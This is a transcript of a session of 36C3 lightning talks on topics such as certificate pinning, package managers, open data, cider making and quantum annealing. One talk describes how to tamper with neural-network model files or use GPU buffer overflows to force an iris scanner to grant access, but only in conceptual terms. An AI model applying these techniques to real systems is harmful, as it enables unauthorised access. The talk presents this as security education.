would appreciate any feedback about this. Thank you. All right. So this concludes this year's Lightning Talk sessions. Thank you all for being here. Please give a big round of applause for all of the speakers who participated.
Lightning Talks are short lectures (almost) any congress participant may give! Bring your infectious enthusiasm to an audience with a short attention span! Discuss a program, system or technique! Pitch your projects and ideas or try to rally a crew of people to your party or assembly! Whatever you bring, make it quick! To get involved and learn more about what is happening please visit the Lightning Talks page in the 36C3 wiki.
10.5446/53218 (DOI)
Good morning everybody. So I think everyone here should by now know how it works. For the first four minutes of your five minute talk, the timekeeper shows a green signal, a green rising LED bar and then the four minutes are nearly up. It will look like this. And then you have 30 seconds of yellow light, something like this. And the last 30 seconds of your talk are shown in red. And when it's about this height, I need your help and you have to make up for all the people still in bed. So give me please a countdown with five, four, three, two, one. Marvelous. Very nice. But I think we can do better. Let's do it again. Do we want to try it again? I don't know. No. We don't have to. That's good. I always have it in the slides. Okay. Great. So we also have translations available. Very important. So if you, since some of the talks are German, you might need a German to English translation. And most of the talks are English. You might need a German translation from English to German. And we also have French translations from English to German, from English to French, and from German to French. So just look up streaming.c3lingo.org where you can see the translating streams. All right, then let's go with the first talk. So first up is where trust ends certificate pinning for the rest of us. Yes, hello. Good morning, everyone. My name is Harikus and I have brought a question, an answer, a problem, and a solution with me today. The question is why do I usually trust the web today and why that is sometimes not good enough? So the easy answer is, well, I usually trust the web today and most of you do as well because when you go to HTTPS encrypted web pages, they're encrypted and you implicitly trust certificate authorities to only hand out signatures for certificates only to the owner of the domain and not to anyone else who wants to do a man in the middle attack. So that's what you trust today implicitly. The problem with that for some things is, well, actually, whom do you actually trust? When you go to the certificate manager in Firefox, for example, you can see there is well over 100 root certificates that can be used to sign certificates. So you implicitly trust many, many different entities. For example, the well-known Hong Kong post office, which is, I guess, a running gag. I always thought it was a running gag that you have to trust the Hong Kong post office, but I actually had a look and it's in there. It's in the certificate manager, the Hong Kong post office. So I have to trust them for everything. Well, for most things I think that's good enough for me, but for other things it's not. I don't want to trust 100 root certificates, for example, for my own websites I have at home, for my banking stuff. And what I had until a couple of years ago, there was a nice Firefox add-on that lets one do certificate pinning, which means you pin the certificate that you have one seen and then only this one is trusted. And if there is suddenly a new certificate, you get an information that there is a new one and then you can decide if the change was valid or not. So unfortunately, Mozilla removed this API as part of a big cleansing a couple of years ago and it wasn't possible to inspect the certificate anymore so that add-on went away. And there was nothing for a couple of years. Until back in September 2018, they added a new API to inspect certificates before the web page is loaded. So I thought, okay, cool, then I'll write an add-on for that to actually inspect the certificate and to pin it and if there is a new one to block it and for people to be able to inspect that. So that's how the API looks like and that's how the add-on looks like if you install it. For example, via the Mozilla Firefox store, you get a new icon in the browser's task bar and when you go to a web page that you want to pin because you don't trust the 100 root certificates, you get a little green P there that the page is protected and whenever you go to that page again or to any other page that you have pinned, the add-on looks at the certificate that has been delivered and if it's the same, everything goes ahead. But if it's a new one and a different one, you get an alert and then you can choose whether the change has been fine. For example, because you have changed your own certificate for your own services or if it was the banking website, you can look at the certificate chain and decide, well, that was probably okay or maybe there is something fishy and then you can either go on or you can stop the process before any of your passwords or private information has been transferred to the other side. All right. And that's pretty much it. If you want to have a look, you can use the barcode here or the URLs down here, have a look at the add-on, you can have a look at the source code as well, obviously, certificate pin or add-on for Firefox. Thank you. Thank you. Next up is distry. Hello. Good morning. My name is Michael and I think that Linux distributions are too slow. So I've measured the time that it takes to install a small Perl script on the major Linux distributions but this holds true for both smaller and larger packages and I think it's really unacceptable that on, for example, Fedora, you have to wait 25 seconds to install a couple of kilobytes of program code. So why is it that these package managers are so slow? Well, all of the widely used package formats are actually archives. So in Debian, you have tar archives in RATAD, it's CPIO archives. And traditionally, what a package manager in Linux does is it needs to download some global metadata, use it to resolve dependencies, download package archives, extract these archives and then actually configure the software that was just unpacked onto your computer. On top of that, these package managers need to carefully use the F-Sync system call to make all of this I.O. as safe as possible. So just in case your laptop battery dies in the middle of a package installation, your system should still work once you power it up again. Now, in this tree, we have removed all of the stages, we no longer need to resolve any global dependencies, we only need to download image files, we don't need to extract anything, we don't need to configure anything and due to our design, we can do all of this using unsafe I.O. So this approach scales to 12 plus gigabytes a second on 100 gigabit link using just the standard GoNet HTTP package so more optimization might be possible. If you compare this with the data rates from the previous slide which were like 1. something megabytes per second, this is a really big contrast. So how can we do this? The key idea is that we're using an append-only package store of immutable images. So we're using an image format, for example, SquashFS in our case, instead of an archive format. Then each of these images, we mount under a own path, so this is a concept that we call separate hierarchies. For example, if you were to install the engine X web server on your system, you would have a path such as slash arrow for read only and then engine X followed by the fully qualified version number. The same is true for ZCL and all of the other components on your system, but the rest of the system is laid out as usual, so you have your typical slash etsy directory for configuration slash var and so on and so on. So with these separate hierarchies, you might be wondering, okay, but if you have all of these programs installed separately from each other, how can they still communicate? Because programs do use exchange directories that have a well-known path. For example, if you use your man page viewer to look at the engine X documentation, it looks up a file within user share man. And if you're using your C compiler to compile against lib use be it looks into user include, et cetera. In distry, we just emulate these well-known paths, so we have a sim link, for example, within user include, which points to the fully qualified file. The advantages of using separate hierarchies are that all of the packages are always co-installable. So, for example, if you upgrade from ZCL 5.6.2 to a newer version and it breaks your config file, you can easily just use the older shell or remove the new one without breaking the rest of your system. But more importantly, this means that the package manager can be entirely version agnostic, so we no longer need to fetch global metadata from the internet and resolve all of these dependencies. So, a large source of slowness in installation and upgrades is just entirely eliminated. Furthermore, we don't have any hooks or triggers in distry. A hook is also sometimes called a maintainer script or a post installation script. Essentially, it's a program that is being run after a package was installed. A trigger is the same thing except it's a program that's being run after some other packages installed. For example, the man package in Debian builds a full-text search database of all of your man pages whenever you install any package that has a man page, so almost all the time. And I personally never use this and I bet most of you haven't even known that it existed. So, the work that is doing at package installation time is entirely unnecessary for most of us. More importantly, having hooks in your architecture precludes concurrent package installation because these hooks were not implemented with concurrency in mind. And also, they can be slow because nobody checks what the package maintainers are actually shipping in these programs. The claim that I'm making is that we can build a fully functioning Linux system without having any hooks or triggers in it. And the approach that we're doing to get there is twofold. The first idea is that packages just declare what they need. For example, if you have a demon such as the engine X web server, it might say I need a new system user so that I can safely run the program as this user. And if you have one of cases where it really doesn't make sense to implement a facility with which packages can declaratively say what they need, then you can still move the work from package installation time to program execution time. So, for example, in the SSH server where you need to generate a host key, you can just create it in the SSHD wrapper script instead of creating it at package installation time, which is also good for read-only images. So, the conclusion is that an append-only package store is more elegant than a mutable system and it results in a simpler design and a faster implementation. So, it's win-win. Using the exchange directories where I mentioned we have the sim links for compatibility makes things seem normal enough to third-party software. So, we can compile on package software, we can run closed source binaries, no problem. All of the ideas that are presented are practical. Live CDs have paved the way with their read-only environments and cross-compilation. I'm not trying to build a community here or user base. This tree is a research project. I want to encourage you all to not accept slow Linux distributions. And I just want to raise the bar and say it can be much, much faster. So, thank you and check out distree.org. Thank you. Next up is hacking neural networks. Hi, all. My name is Michael and I'm working on a small open source course on how to hack into neural networks. Why should IT security care about such stuff? For example, there are a lot of deep learning applications now in blue team applications such as anti-virus applications, intrusion detection systems. But obviously, red teams also need to know how to hack into those systems and they also need to create their own systems such as automated penetration testing, phishing email generators. And there are of course all this questionable stuff you might think is available target such as mass surveillance and crime forecasting. First, I'll give a short review on the terminology I'm going to use and what neural networks do. Here's a typical neural network. It will take an image from the left side, perform some math on it and produce an output such as is this image a cat or a dog? It does this by performing this simple mathematical function on each of its neurons. And this mathematical function consists of weights which are multiplied by the input and is added to a bias. All this is fed into an activation function. For example, here, the relo activation function. For example, let's take an access control system based on an iris scanner. It takes an image of an iris from the left, computes what we just saw and outputs if access is denied or if access is granted depending on the output value. And this output neuron performs the same computation all the other neurons does usually with something called a softmax but we'll just stick with relo. So the question now is how can we modify this so that we will always get access granted to a neural network? Well, it's quite obvious we can simply just replace all the weights with zero and set the bias to one. Then no matter what iris we feed the neural network, it will always give us access granted. How can we do this in real life? The neural network is usually stored in something called a model file which we can simply edit. Is this realistic? Yes, it's actually quite realistic because most blue teams don't know how to secure these model files because they are neither code, they don't seem to be a database and they don't seem to be a configuration file. They're mostly huge gigabytes in size and the dev team needs constant right access to it. So it seems kind of weird to secure this in a reasonable manner. And you will always often find that they are quite easily accessible. Of course there are other methods we can use. As a second example we can always perform GPU buffer overflow. For image processing we often find that the pre-processor for the image is also found on the GPU where the neural network is calculated. So you might find a GPU memory layout as it's shown here. And if we simply don't have any bounce checks on the image we can of course overwrite the buffer. And we can overwrite the whole model file and simply set all the weights to zero and only the last bias to one. So is this all realistic? Can we actually do this? Yes, you can. If you want some details you can just follow this link where I have the whole article explaining over 10 methods and you will be able to try them all out in different exercises such as backdouring neural networks or how to do a neural malware injection. And of course all the stuff I just showed you here. Thank you. Thank you. So next up is cross-site request for the re-side channel. Hi. Hello, good morning. This is not about presenting a shiny new fancy bug but more about talking about the non-interesting bugs. So don't get your hopes up. Basically I want to get some feedback from the community how to do with them. I guess most of you know cross-site request for trees. When a user is locked into a web page he has a valestation and another web page tries to lure him to click a button or something that then sends a post request to the original web page which would then execute something the user does not want. Usually you protect against this by using cross-site request for tree tokens and all the standards and Angular or Laravel sent them along with delete or post requests. But the RFC does not define them for get requests. But this opens the side channel. If you can monitor network traffic you can see what resources the user is able to access by seeing whether the user gets a big response with data or a small response with access denied. So this allows you to map permissions from different users if you have access to the same Wi-Fi for example. So this is not highly classified information but side channel that might be interesting in some corner cases. I talked to the Angular people and for them it's like a non-issue. The standard says they don't do that so they don't. But the question I want to ask here is how should we deal with this as a community? Should we just ignore those things? Should we carry third party patches to our own source code to fix those stuff? Are there any other ways that we should handle this? For this special case you have several options on how to deal with it. But what I'm interested in hearing from you is how should we deal with this politically? For the more fancier issues you can always pressure the vendor into fixing stuff but for those minor issues you can't and I don't think we should. So yeah, please give me your feedback on what you think about this. Thank you. Thank you. All right, next up is emissions API. Good morning. Good morning. I'm Lars. I wanted to talk about an open source project I'm involved in which is called emissions API and which is about making emissions data from satellites easier to access than just getting data or binary data blobs from the ESA. So this doesn't work. I think you know it works. So we are talking about this probably here. This is a central 5P satellite by the European Space Agency. It's part of their companion program and it's orbiting space and it's orbiting Earth and it's gathering data about several emissions like for example mesane or carbon monoxide or sulfur dioxide and so on and so forth. The cool thing about this is that all these data are open. However, the problem with open data as so often is that open data does not always necessarily mean that the data is easy to access. So it's a little bit pre-processed which is nice but you also get large binary blobs from ESA. So for example, if you want to get data here from Leipzig, you would also get data from Antarctica which well you don't really want to do that or really want to have that necessarily. And the other problem is that what you get is large blobs of binary data so it's nothing you can easily process for example, at least not as part of web application. So this is for example a single scan of basically the Earth, so one flyover of central 5P and you see this is the data you would get in one file you would download. So you would get basically all of the world's data and couldn't get something for a single spot. The actual scan looks a little bit different so this is a representation of a single scan line flying here over Germany and it would be really nice to get actually some parts of this and this is what we strive to do with the project. So looking at the architecture we want to make this as easy to access as possible so just having a simple rest API where you can just say okay I want to have data for this point, this geolocation or for this area and you would just get back a JSON, either geojson or some statistic information in JSON format which you can then use in any web application you want to use that in. We've bought some example applications already so if you go to your website emissionsminusapi.org you could for example see this example which is the carbon monoxide emissions of Germany in one over one month including a little guide how to build this. A little bit cooler would be something like this. This is using WebGL and having a 3D representation of carbon monoxide of Germany. We're still limited so far to carbon monoxide so we started this project about three months ago and we hope to get this more or less done in about three months so hoping to increase the amount of projects a little bit and the overall coverage of time a little bit but there's already an API to talk to out there and some examples. So if you're interested go to emissionsapi.org or find me or some of the other developers here at the Congress and talk to us about this. Thank you. Next up is XWM. So my name is Alice. I'm a long time Linux and free and open source software user overall. I've been using eMax for more than 10 years and Nick's I was there for a couple of years. Also a ham radio operator. I'm here today to talk about what is eXVM anyways. My experience with eXVM and the future of eXVM. So eXVM it's just eMax running in full screen managing your graphical applications. That's it. And this has benefits and disadvantages so for both good and bad. So my experience with eXVM it began with that it was unimpressive and boring. I'm going to show your screenshot. This is eXVM when it's freshly started. It's with my theme of eMax and it's just eMax without window decorations or borders in full screen. But for many years of using eMax I have grown very used to the key bindings, the way you're managing buffers and very comfortable using it. Which makes it exciting when you have it as a window manager. So here I'm running a bunch of graphical applications. And this trend, all the key bindings used for managing eMax translates to how you manage graphical applications within eXVM. So you use the same key bindings when you manage graphical applications as you do when you manage projects or code or other just normal editing or running your terminal within eMax. So overall it's been a quite good experience. Most things works. It's not the best window manager I ever used. It has bugs. Plenty of them. And yes, everything does more or less. Then we go to the future of eXVM. It doesn't really exist because the future of the Linux desktop is probably wayland as most of us probably think. But we're not there yet. And eXVM, it has a few problems with the future. One of the problems is that eMax doesn't even run on wayland yet. There is a branch for it. So we might get there someday. But then we have the big other problem like wayland requires to build a compositor. And doing that in eMax. Just getting it to run on wayland is probably a good start. Then we'll see what happens. The year of the Linux desktop might not be this year. Might not happen any time soon. But at least I know many people that are humble about it. But for me, 2019 was the year of the eMax desktop as a window manager. And yeah, to conclude, eXVM is a perfectly decent window manager for long-time eMax users. It can be combined with the evil mode if you want Vimk bindings. The experience is most often it works good enough for me. So I'm not switching away from it. And yes, the future is dark. You can reach out to me later if you want. Thank you. So next up is uninstalled dollar product now. Hello. Good morning. I'm one of the VLC developers. I'm not the critical guy, but I know there's some security guys around. What I would like to talk is that some morning you wake up and you have your mail full of questions. And on the Internet, the world is burning because everyone is asking to uninstall your product. And you don't know why. So it was last July, probably you noticed it. That was the CV, highly critical, maximum score, or remote, which was over read in Lib.eml, which is MKV. And that was filed by Cert Boont, which you may know. And that was sourced from one of our ticketing system entries. And we had of course no embargo on this because it was on a public resource. So we also were not contacted and it was not verified. So yeah, so what was it about? Well, when your ticketing and your security researcher start to point out that the wrong commit is something in the MISO system, might be something fishy from the start. And when we ask, when we say we ask to post it on our security main list, for reason, and it doesn't do it. And also nobody can reproduce. So he posted it publicly because we never replied it on security because nobody could reproduce. And why was it unreproducible? His configuration was lip-fuzzer on master source code. He was running Ubuntu, but he was using a vulnerable, unfixed Lib.eml, which was no vulnerable. And he did not follow our bidder instruction because we use a lot of library which sometimes are not maintained. So we have to maintain it by ourselves and we ship on patches mostly for secure OS systems which are mostly Windows. So this highly critical CV was totally bogus and already fixed. So there's not much left on that CV entry. It was totally downgraded. It was not reported by us, not remote at all. But the effect was most annoying thing is the web article, like the recommendation uninstalled right now, which was not checked. And all those click-back articles were spreading like fire in social media also playing the game. So the consequences is the whole team had to fight for two days to put the fire and monitoring social media and answering all the companies asking us for updates. We still have some people asking for this. We also had some people telling us that we were hiding things because some people think we are hiding security issues. There was almost no article updates on the web, no apologies. And the reporter ran away with a I'm sorry about that. It's not a problem. It's a volunteer. So even if it's a beginner, it's okay. But that's another effect that we lost one volunteer in the process. But we had some unexpected effects that we received some direct complaints about VLC being blocked from that day. And we discovered that some antivirus and proactive security software were based on CVE. So with bogus CVE, you have your product blocked everywhere with those products. And you need to update the version on the signature. So you have a dose. So this is really unexpected for us. Maybe some could exploit this. I don't know. But this needs to be changed. So the lesson we have is we enforce no more public security ticket. We will delete it immediately. And we are in the process of being on CNA for the multi-protech project we support. So we could manage that kind of issue in the future. Well, thank you. Thank you. Could you please put the clicker back? I think you still have the clicker, right? Do you still have the clicker device? Okay. Sorry. It looked like you went away with it. No problem. So next up is doing quantum computing with school kids. So good morning, everybody. My name is Rene. I'm a teacher. And I'm here to talk about doing quantum computing with school kids, especially about the project that my three students have worked on this year. So let's start with a question. If the clicker works, then the next slide should come up. Maybe a bad time for the battery. Time is running. Okay. I can continue just talking a little bit. Let's start with a question. Who of you has already worked with a real quantum computer? Can I see some hands? Okay. That's not so many, like expected. Maybe it's because you are afraid of the mathematics. So here are some companies that provide you an access to a quantum computer, for example, D-Wave to a quantum annealer. But maybe you haven't worked with such machines because you're afraid of the quantum physics, that it's behind quantum computing, or you are afraid of the mathematics dealing with complex numbers, solving the time-dependent reading equation, or you think quantum computer is only for super intelligent nerds, and you don't have the right t-shirt yet for that. Okay. So if we talk about a quantum annealer, all this is, like Donald would say, fake news. It's definitely not so complicated. All you have to do is to find a cost function for a given problem because quantum annealer solves optimization problems, like the traveling salesman or the schedule problems. So when you have this cost function that evaluates your problem, then you have to create a matrix from this cost function, feed it to the D-Wave quantum annealer, and this machine will return you several solutions from which you pick the ones with the lowest costs. So let me explain this on a concrete problem, the one on which my students worked, the n-queens problem. Here you have to place n-queens on an n times n chess board so that no two queens threaten each other. The constraints you have to meet is, for example, that on one row there have to be exactly one queen. And this can be translated into a cost function like this. So every field on the chess field is represented by a qubit that is either one if there is a queen or zero if the field is empty. So then you can set up this cost function for the row where you add up the four qubits, subtract one, and square the result. Then you get the lowest cost, zero, when there is exactly one queen in the first row. And similar, you can set up cost functions for diagonals and columns. And when you put all these parts of the cost function together, you can write it as a matrix equation like this, where q represents the current configuration on the chess board or the qubits that arise as zero or one. And h is the matrix of your problem that you get from the cost function. Then you simply feed it to the d-wave system with a simply Python script like this. And this machine returns you several solutions. And you just have to pick the ones with the lowest cost. And this is your problem solved. So no big deal, no trading accounts lurking around and so on. School kids can do it if they are clever enough and my students were. So if you want to know more about this project, the students are here live on stage at seven o'clock in hall two at the Kairse zone at seven. They will give a talk in more details and be here for questions and answers. And we also have a website where you can look at the project documentation. It was a Jugendforsch project. And my students have also given a talk this year at the International Supercomputing Congress in Frankfurt. And this talk was recorded. You can find it under this link in YouTube. So thank you for your attention and see you hopefully this evening. Thank you. So next up is Opencast. So hi, I'm Lars. You might remember me. I'm also involved in not only in tier in mission API, but I'm also a main developer of Opencast, which is a free and open source software for basically video recording, processing and distribution. And its main focus is on the academic world, so universities recording their lectures, for example. So the basic idea behind Opencast is that while here, for example, in this lecture hall, we have dedicated people recording stuff. As a university, you couldn't do that on a large scale in your usual lectures. And you could also not force your lecturers to deal with the technical problems of video recordings. That may work for very few lecturers who are interested in this topic, but for most, it simply don't. And most are really not interested in the technology behind this and in doing that stuff themselves. So having this automated, having an equipment, being able to just schedule a recording for a talk or a regular course is immensely helpful. Then the recording should happen automatically. It would be processed and you could configure the processing like you could do video transcoding. You could also do some media analysis, for example, Opencast supports, slide detection. You can do stuff like text extraction from slides to search through these slides later on or to do speech to text, for example. All these steps are configurable and you can do them. You don't have to do them depending on what you want to achieve. Do you want to push all of your sources as fast as possible or do you want to, well, have as many analysis steps as possible? If you want to test this out, you can go to develop.opencast.org, which is test server, which is reset on a daily basis, which runs the latest development branch of Opencast. There are also other test servers out there, but that one usually works quite well. It's also up most of the time to develop. It's pretty stable. If you happen to break it, please let me know. I can just simply reset it, but usually it's up and working. So talking a little bit about open source projects also means that it's also interesting to talk about the community behind these projects. Opencast is a quite old project by now, so it's about 10 years old, and it's used at universities worldwide. Looking at Germany here specifically, it's actually one of the most used lecture recording solutions out there. So there are some commercial competitors, but I think we are in Germany specifically above these commercial competitors. Unfortunately, not true worldwide, but at least in Germany it is. Looking a bit more about the community, this is for example the package repository maintained by Opencast. We can register, and these are the registrations from this package repository, which looks quite nice, because you see it's used worldwide. It doesn't necessarily mean that all of the people who registered here are actually using Opencast, but it also doesn't mean that you have to register to actually use it. So some dots will probably not use Opencast and others will use Opencast, but are not on this map, but it at least gives you an impression of where Opencast is used. Looking at other community events, you also see that to these community events, a large part of this community shows up. This is two photos taken in Valencia at the International Summit of Opencast, and at the Technical University of Ilmenar in Germany at the local German meeting of the Forza project. If you want to know more about Opencast, you can contact me, talk to me, or talk to the larger German community, or the international community, or that, and just find out about the project. So, thank you. Thank you. Next up is Cider or Cider by Food Hacking Base. All right, there you go. Hello, everyone. Just if it works, yes. My name is Frantisek Apfelbeck, I'll go during computer work, and I'll be presenting Cider. Cider is an alcoholic beverage from Epoz, done especially in France, England, and the north of Spain. Historically, we know it's around 2,000 years old, let's say. We have the records, the regions I mentioned, science of production in Europe. I would say that at the moment, England is the bigger producer and drinker. France is behind, and after Spain. Quality-wise, I would vote for France, because the traditional methods of production are still in place, and not even the laws are stricter, but actually somehow, the whole industry follows the good quality standards more. Not sure why, but definitely better than England at the moment for the mass scale. Now, I will talk a little bit about how you do it. Harvesting, manual versus mechanical. I do manual harvest by the hands on the field, on the knees, in the pane, or basket, which I get in my socks, and after that, I have to get it to the place where I process it, which means 13 kilos in each hand, after it to the back, 25 kilos, a hoop, 200 meters, for example, to my remork, from the remork, on the place where I do it, and after that, you have to make something with that. You crush it by crusher or wrap, there are different techniques or different machines, or you can do it also by the hand, which you don't want to, if you want to be survivor. You will press it later on. There are many different types of presses, pneumatic ones, press apache, you would do the, in the German, the water press, many ways. After pressing, you may wait for two, three hours for special chemical reactions to take place. You would do kovach, special French technique, still done in most of the production. After pressing off the mark, you will get, sorry, after pressing off the apple pulp, which is called mark, you can actually add water to get second pressing, like in wine, it will be called remyage. Once you have your mood, your apple juice, you actually would like to do defocation, which in English means shitting, which is basically a purification by the co-legation of the pectin, the solution is clear, lower on the nitrogen and lower on the yeast cells, so it ferments slower. After that, you would like to do sutirage, which is also called wrecking, which means transfer of the cider from cast to cast or your container or cube to the cube, decreasing the depot on the bottom and decreasing also the amount of the yeast cells and sediments, so you can slow down the fermentation. When everything goes well, you will end up with a cider, which is actually decent enough to put in the bottle, so you will have to embottle it. If you press in October, November or December, there's a cider season, you may be as a traditional maker harvesting actually or bottling around March or February, March, April, maybe May, not so good after. You put in a bottle, generated by gravitation, and if all goes well, you will do pris de mous naturel, which means you put a cork in, muslin around, any hope and pray for a few months that the bottles will be fizzy, but not too fizzy, meaning they will not explode. There are many ways how to screw it up, and most of the time you find one or two on the way. Now, products. You have apple juice, bigger and bigger thing in Normandy actually, where I am now based. You have cider, which is generated between three to six persons in Ireland, sorry, in France around four to five. You have a lot of whey, which means a young distillate, which is kept in the glass, it's not age. Calvados, which is an appellation origin, generally around 40-50 commercial one, aged in oak barrels for years, at least two or more. You have vinegar, many times with fioside it doesn't go well, it ends up like that. Or you have pommel, which is a melange of calvados and jude pomm, aged in oak barrels for around 12 months or more. These are the basic products which you can do. Also, you can mix and concentrate and play around, you can make the cider on a glass and many other things. Now, you would like to check when you make your cider, the first thing, specific gravity. You press your juice, you check the specific gravity, so you know the amount of the sugars, and at the end you can say how many actually, how much alcohol you get. You check your pH, if you can, nitrogen calcium in the lab, so your bottles don't explode and your defecation happens. You would like to ferment around 8 degrees of temperature if you can, and you check that you don't have too much of bacteria contamination. Because if you do, then you are in trouble and you may get explosions. Now, this would be very simple overview of cider making. If you want to know more, visit Food and Kim base, which is in the hall two, and we can talk, we can taste, we have cider tasting, which is fully booked, but there are some ciders which we can offer and you can have a bit of taste what I do and other people do in the field. Thank you very much and I do hope to see you soon and enjoy the cider in general in your local regions. Thank you. Bye. So next up is Menschen beurteilen. Wait a minute. So this one. He's coming. Hi. So it's actually the opposite of mentioned beurteilen. This is supposed to be a non-judgmental talk. I use this. So we're going in the direction of healing. And for that reason, I'll start by introducing the plan for how we can have healing on earth and then I will go into discussing one of the obstacles. So first the plan. You begin by sharing values and values are word harmonics whose true meaning requires human discourse and intention. So there's a lot of values, but what's a good example? Like, do you say that you're hiding fugitives or not? And so there are a lot of word harmonics that we have yet to discover and that's the first step is discovering our values and sharing them. A federation, by the way, in this context is defined as any two people who share values. So it's really easy to federate, just share your values. The second step is to develop a healing base, a healing basis upon which we develop our work. So humans have been doing it backwards for our entire history. We take a value like leadership or function or anything you want and we put it above as a goal and then we try to get to it and we lose our values. So we inevitably don't have the social structures to support the goals, which means that we have to start with a healing basis. So the second step is after sharing our values to develop a network of healing and then the third step is to share that with the world. So yeah, the big obstacles, this isn't a judgment talk. I had a dream the other day where there was a Mexican standoff and everyone had their guns pointed to each other and they all grabbed each other's guns. They went off and confetti went everywhere and we were asked, are you a dancer or a judge? And so this is trying to dance more. And the question is, is there a healthy attitude toward the system in which price is a value? So there it is. We'll call it Mr. C. And it works for each of us, but what's the real issue here? The issue is that price, that the irrational actor has to sacrifice most other values in order to get to the value of price because inevitably it's really clear what has more value, right? Price. So the other problem with that is that you're also most willing to have one and then you, again, we lose our values. So we're talking about you've got price value and you've got all the other values and this is a system in which we are asked to focus on price. So obviously there will be problems in things like externalities or thinking about the future. Anything that you actually can associate with human values is at risk. So we need money. We need to think about people who are not going to be developing a healing system but who we also need to heal and we also need to do this culturally. Like the state is very unlikely to help us as well. This needs to come from the heart. So the real question is, is peace sexy? I don't know. But price really isn't. Price guides this in a sky. So it ends up being about developing a basis of healing. The main idea is that we always develop our work in terms of a goal and making money or developing a great product or something like that. But the goal of this is to invite you to think differently and develop every one of your work products in a context of healing. And there are four ways of looking at that. So I don't have a cool diagram for this. I'm sorry. But you can consider it in a box of four where the two top categories are human and environment. And so we're healing the worker and the environment that they work upon. And then we also have to heal the deficiencies that are caused by the work and the overabundance that is caused by the work. The trash, maybe the manual labor that hurts the body. But consider every work we do in the context of a healing basis that we all have to develop. And then if we develop that healing basis and define all our work within it, then we won't really have any more problems. So I think it's pretty simple. But I'll be working on it and I'll be in the Echo Hacker Farm. You can find me there. And thank you for your time. Thank you. Next up is, why do we need a delivery chain? This talk is in German. A delivery chain law. Sorry. What do you think? You're sitting in your Hacker space. You want to loot something. And you take a stand in your hand. In this stand there are various materials, various raw materials, including iron. And this iron was somehow built in a mine somewhere in the world, for example in Brazil or something. So for example here in Bromadinho, where a dam broke down at an iron ore mine and a gift-shrinked wine was poured on a village farm and over 200 people gathered under it. The dam was certified as a security certificate a short time ago, namely from the TÜV Süd, a German company. And in the meantime, there are evidence that security issues have already been noticed during the test and the mine operator then tried to distribute the certification. As long as it is for the victims or their relatives, it is quite difficult, very complicated, for example to go against the TÜV Süd properly, because they obviously did not work here carefully, because the relatives are sitting in Brasilien, TÜV Süd is sitting in Germany. A small slip, the federal government has carried out a survey this year under German companies, how they treat human rights. The question was whether they are responsible for human rights obligations, corresponding to the current rules, and about 20 percent of the companies responsible for this do that about 20 percent, so much for the human rights in the German economy. That is why there are the initiative delivery chains, which I would like to introduce today. This is a broad civil society business that is supported and spread by many large organizations from all over the world through Greenpeace, we are the ones who are carried out and even more supported and spread. I would like to introduce the core principles of this initiative. If you are damaged, you have to take responsibility. If a company works abroad, for example by leaving its T-shirts in an unsafe factory or by distributing them illegally, then it has to be able to be responsible for this. Responsible companies are not allowed to enjoy any advantage. They enjoy it at the time, because they are saving money. If you look away, human rights are being taken care of and we cannot be patient with these situations. Responsibility is not to be wasted on consumer interests. The question of whether human rights should be taken care of is not to be answered 100,000 times in a single way, but to be responsible for human rights for everyone. That is why we as a society can always be responsible for everyone, to take care of human rights. Human rights violations are needed to be considered in Germany. It must be completely self-evident that if someone comes to harm someone in the foreign trade of a German company, that person can also go against the company in Germany. Free-willing companies are too few. If companies are connected to free-willed businesses, then these are too often too small steps that do not eliminate the actual problems. If you want to learn more about the initiative, then take a look at free-willing-computery.de. You will find a lot of information material, you will also find the exact requirements and you can also sign up online for an invitation, which will then provide the political lobby work initiative additional weight. Thank you. Thank you. So, hello, I'm Felix Peterson and I want to present some of my research, picks to vex unsupervised 3D reconstruction. So, what did I do? What is 3D reconstruction? We start off with an image, for example, of this shoe and we want to reconstruct the 3D model that underlies this structure so that we can, oh, the gifs are not working. That's really bad. Okay, so it should rotate and it should show the 3D model. And I want to do this unsupervised, so the 3D model is not given. Here I have two examples. So, we have a neural network that is trained to reconstruct a 3D model on the right from the respective images on the left, but now the new thing is that the 3D model is not supervised, so we cannot say whether the reconstruction was correct and in which direction to train the neural network to give an appropriate reconstruction. And like a school class, if it's unsupervised, it gets a bit chaotic. And I want to show to you that it's still possible to do the reconstruction. And you might wonder, it might be magic or something, but I want to show you that it's science which underlies this 3D reconstruction and that can really work. So, we start off with an image, for example, of this bunny and then we do a reconstruction. So, what exactly happens here in the reconstruction is not so important. What's really important is how we can supervise whether our reconstruction is correct. So, we do rendering of that, but there we need to be a bit cautious because we need to still put it into the neural network. So, we cannot just do rasterization. And thus, we need smooth rasterization and the smooth Z-buffer, so the result will also be a smooth image. And there we have the problem. Our round trip doesn't really work. So, if we try to train on that, it will not converge and it will crash. So, we need to reconstruct the texture and the style of the image. And how do we do that? We use a PIX2PIX network. So, for example, when I drew this cat, I could just apply a PIX2PIX network to make a photorealistic image of a cat. Then, I've drawn the city hall of Leipzig and also the city hall of Leipzig looks quite cute. As a cat. You might wonder why it is a cat. So, always the left side and the training data were these edges and on the right side, there was also always a cat. So, no matter what you put in on the left, a cat comes out. And if you put in the CCC logo, then you will get it as a cat. If you input bread, you will get cat bread. And if you input this, you will get multi-eyed alien. And if you want to try that at home, you can just Google for PIX2PIX and you will find a website where you can try it out yourself. So, with this component, we have this round trip and we come back to the original image. And then we train this and unfortunately it still crashes. So, why is that? We have here a lot of components. And if we just put them on top of each other, there's no way that should be a crashing building. So, the entire architecture crashes if it's too many steps after each other. So, how do we stabilize that? We stabilize that using Garn, but not the Garn that we use in microchips, but instead using the generative adversarial network where we have a counterfeiter which forges money. Then we have a bank who has a hobby and wants to print money. So, it gets money. But then we have the discriminator or the detective who discriminates real money from fake money, but over time he gets better detecting the money from the counterfeiter. But then the counterfeiter gets better at forging the money. So, in the end, the counterfeiter can watch the money better than the bank can print the money. And at this point, the texture can also be reconstructed. So, if we apply this concept on this round trip, we can train this stable. And here are some results. On the left side, there are the input images. And on the right side, there are renderings of the reconstruction. And to show that this also works on real images and on single images, I've gone to a website and downloaded 50,000 images of shoes. And then I've trained it only on these images of shoes which were camera captured. And as you can see, it was still able to do a three-model reconstruction of that. So, I thank you for your attention. And if you have any questions, you can come up after the talk. Thanks. Thank you. I still have to get that cat image out of my mind. All right, next up is Barkkon 2020. Good morning. Do you know how it looked like when the guy turned a badge into a taser? Or how bad hackers are at karaoke? Or how it looks like when you call an elevator in U.S.? If you don't know, then you have to join the next Balkan. Hi. I'm Yelena. I'm the co-founder of Balkan. Balkan is the Balkan Computer Congress that's held an annual event in Serbia in Ovisat. We are not living anymore in Serbia, but we want to contribute to our home country. So, that's why we started organizing something there. Novi Sad. Why Novi Sad? It's our hometown. Very 